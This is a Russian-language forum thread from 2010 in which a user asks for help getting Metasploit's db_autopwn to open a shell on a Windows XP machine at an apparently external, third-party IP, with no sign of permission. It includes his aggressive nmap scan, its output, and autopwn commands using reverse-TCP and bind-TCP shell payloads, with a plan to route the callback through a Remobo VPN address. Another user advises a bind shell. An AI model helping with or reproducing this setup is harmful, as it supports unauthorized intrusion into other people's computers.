PDA

Просмотр полной версии : Проблема в Metasploit.. Нужны советы.


BTKot
19.11.2010, 17:48
Начну с самого начала.. Родился в ... Ладно к делу.

Запустил msfconsole

msf > db_driver sqlite3

msf > db_create test

msf > db_nmap -sS -sU -sV -T4 -O -A -v -F -PE -PP -PS80,443 -PA3389 -PU40125 -PY --version-light -g 53 -T5 (IP у него внешний, тобишь белый?)

Host is up (0.11s latency).

Not shown: 187 closed ports

PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn

445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds

67/udp open|filtered dhcps

68/udp open|filtered dhcpc

123/udp open ntp Microsoft NTP

137/udp open netbios-ns Microsoft Windows NT netbios-ssn (workgroup: WORKGROUP)

138/udp open|filtered netbios-dgm

445/udp open|filtered microsoft-ds

500/udp open|filtered isakmp

520/udp open|filtered route

1900/udp open|filtered upnp

4500/udp open|filtered nat-t-ike

Остальная инфа по сканированию думаю не нужна...

Вопрос в том что, у меня динамический IP.. Если даже чтото пройдет то сессии не будет.. Проверял

Есть программа типо Hamachi называеться Remobo.. Возможно ли через неё какнибудь сделать сессию? Я думаю надо что-то сюда дописать.. Типо db_autopwn -p -e windows/shell_reverse_tcp тут же LHOST на виртуальный IP remobo, порт.. итд?

Вот мой ifconfig на Remobo

tap0 Link encap:Ethernet HWaddr 80:a1:61:ae:f4:9d

inet addr:7.16.8.X Bcast:7.255.255.255 Mask:255.0.0.0

inet6 addr: fe80::82a1:61ff:feae:f49d/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:3 errors:0 dropped:0 overruns:0 frame:0

TX packets:8 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:500

RX bytes:1770 (1.7 KB) TX bytes:1648 (1.6 KB)

Подключить внешний IP не предлогать

Тыкните хоть пальцем на ссылку если в лом писать)

Unknown
19.11.2010, 18:30
BTKot, зачем ты reverse shell хочешь прикрутить?

Его используют обычно когда ЦЕЛЬ за натом, или у неё динамический ип.

Обыкновенный bind shell сделает дело в этом случае, если у цели есть внешний ип.

Насчёт белого - это про спам листы скорее всего, хотя утверждать не берусь.

BTKot
19.11.2010, 19:03
tty0 said:
BTKot, зачем ты reverse shell хочешь прикрутить?
Его используют обычно когда ЦЕЛЬ за натом, или у неё динамический ип.
Обыкновенный bind shell сделает дело в этом случае, если у цели есть внешний ип.
Насчёт белого - это про спам листы скорее всего, хотя утверждать не берусь.


Я так для примера писал) У меня Динамический IP.. У него Статический.. Допустим так работает.. пишу.

db_autopwn -p -e windows/shell/bind_tcp и все? 0 сессий.. Я как понимаю, если даже прогрузился эксплойт.. возвратное сообщение с работой в shell не приходит.. У него SP2/3.. По одному эксплойды проверять не хочеться.. Я хочу както прописать чтоб работало через Remobo или мож кто предложит альтернативу.)